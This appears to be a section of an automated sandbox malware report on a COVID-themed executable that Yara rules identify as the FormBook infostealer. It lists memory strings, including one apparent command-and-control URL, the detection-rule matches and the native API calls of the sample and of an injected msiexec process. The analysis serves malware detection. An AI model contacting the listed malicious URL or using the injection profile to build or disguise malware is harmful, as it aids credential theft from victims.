          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com0
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF&
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaA
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsF
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdZ
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdic
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdl
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comeH
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessedZ
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgritoe
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlic0
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc./S
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comow
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comzana
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn$
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn=
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmpu
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ghtsl
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/~
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.7
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de3z
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deXz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deo
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmpString found in binary or memory: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A070 NtClose,3_2_0041A070
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A120 NtAllocateVirtualMemory,3_2_0041A120
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419F40 NtCreateFile,3_2_00419F40
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419FF0 NtReadFile,3_2_00419FF0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A072 NtClose,3_2_0041A072
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A11B NtAllocateVirtualMemory,3_2_0041A11B
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419F3A NtCreateFile,3_2_00419F3A
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00419FEA NtReadFile,3_2_00419FEA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01559910
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015599A0 NtCreateSection,LdrInitializeThunk,3_2_015599A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559840 NtDelayExecution,LdrInitializeThunk,3_2_01559840
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01559860
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_015598F0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A50 NtCreateFile,LdrInitializeThunk,3_2_01559A50
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01559A00
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A20 NtResumeThread,LdrInitializeThunk,3_2_01559A20
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559540 NtReadFile,LdrInitializeThunk,3_2_01559540
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015595D0 NtClose,LdrInitializeThunk,3_2_015595D0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559710 NtQueryInformationToken,LdrInitializeThunk,3_2_01559710
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559780 NtMapViewOfSection,LdrInitializeThunk,3_2_01559780
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_015597A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01559660
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_015596E0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559950 NtQueueApcThread,3_2_01559950
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015599D0 NtCreateProcessEx,3_2_015599D0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155B040 NtSuspendThread,3_2_0155B040
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559820 NtEnumerateKey,3_2_01559820
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015598A0 NtWriteVirtualMemory,3_2_015598A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559B00 NtSetValueKey,3_2_01559B00
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A3B0 NtGetContextThread,3_2_0155A3B0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A10 NtQuerySection,3_2_01559A10
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559A80 NtOpenDirectoryObject,3_2_01559A80
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559560 NtWriteFile,3_2_01559560
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155AD30 NtSetContextThread,3_2_0155AD30
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559520 NtWaitForSingleObject,3_2_01559520
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015595F0 NtQueryInformationFile,3_2_015595F0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A770 NtOpenThread,3_2_0155A770
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559770 NtSetInformationFile,3_2_01559770
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559760 NtOpenProcess,3_2_01559760
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155A710 NtOpenProcessToken,3_2_0155A710
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559730 NtQueryVirtualMemory,3_2_01559730
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559FE0 NtCreateMutant,3_2_01559FE0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559650 NtQueryValueKey,3_2_01559650
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559670 NtQueryInformationProcess,3_2_01559670
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01559610 NtEnumerateValueKey,3_2_01559610
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015596D0 NtCreateKey,3_2_015596D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9540 NtReadFile,LdrInitializeThunk,14_2_045C9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C95D0 NtClose,LdrInitializeThunk,14_2_045C95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9650 NtQueryValueKey,LdrInitializeThunk,14_2_045C9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_045C9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C96D0 NtCreateKey,LdrInitializeThunk,14_2_045C96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_045C96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,14_2_045C9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,14_2_045C9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,14_2_045C9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9840 NtDelayExecution,LdrInitializeThunk,14_2_045C9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_045C9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_045C9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C99A0 NtCreateSection,LdrInitializeThunk,14_2_045C99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A50 NtCreateFile,LdrInitializeThunk,14_2_045C9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9560 NtWriteFile,14_2_045C9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CAD30 NtSetContextThread,14_2_045CAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9520 NtWaitForSingleObject,14_2_045C9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C95F0 NtQueryInformationFile,14_2_045C95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9670 NtQueryInformationProcess,14_2_045C9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9610 NtEnumerateValueKey,14_2_045C9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA770 NtOpenThread,14_2_045CA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9770 NtSetInformationFile,14_2_045C9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9760 NtOpenProcess,14_2_045C9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA710 NtOpenProcessToken,14_2_045CA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9730 NtQueryVirtualMemory,14_2_045C9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C97A0 NtUnmapViewOfSection,14_2_045C97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CB040 NtSuspendThread,14_2_045CB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9820 NtEnumerateKey,14_2_045C9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C98F0 NtReadVirtualMemory,14_2_045C98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C98A0 NtWriteVirtualMemory,14_2_045C98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9950 NtQueueApcThread,14_2_045C9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C99D0 NtCreateProcessEx,14_2_045C99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A10 NtQuerySection,14_2_045C9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A00 NtProtectVirtualMemory,14_2_045C9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A20 NtResumeThread,14_2_045C9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9A80 NtOpenDirectoryObject,14_2_045C9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9B00 NtSetValueKey,14_2_045C9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045CA3B0 NtGetContextThread,14_2_045CA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A070 NtClose,14_2_0069A070
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A120 NtAllocateVirtualMemory,14_2_0069A120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699F40 NtCreateFile,14_2_00699F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699FF0 NtReadFile,14_2_00699FF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A072 NtClose,14_2_0069A072
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0069A11B NtAllocateVirtualMemory,14_2_0069A11B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699F3A NtCreateFile,14_2_00699F3A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00699FEA NtReadFile,14_2_00699FEA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC21D90_2_00BC21D9
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC04700_2_00BC0470
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC17700_2_00BC1770
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0EF80_2_00BC0EF8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC40000_2_00BC4000
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC52300_2_00BC5230
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC52200_2_00BC5220
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC54380_2_00BC5438
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC54290_2_00BC5429
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC56980_2_00BC5698
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC56890_2_00BC5689
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC58520_2_00BC5852
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0E780_2_00BC0E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC4E780_2_00BC4E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC3FF00_2_00BC3FF0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB26680_2_04BB2668
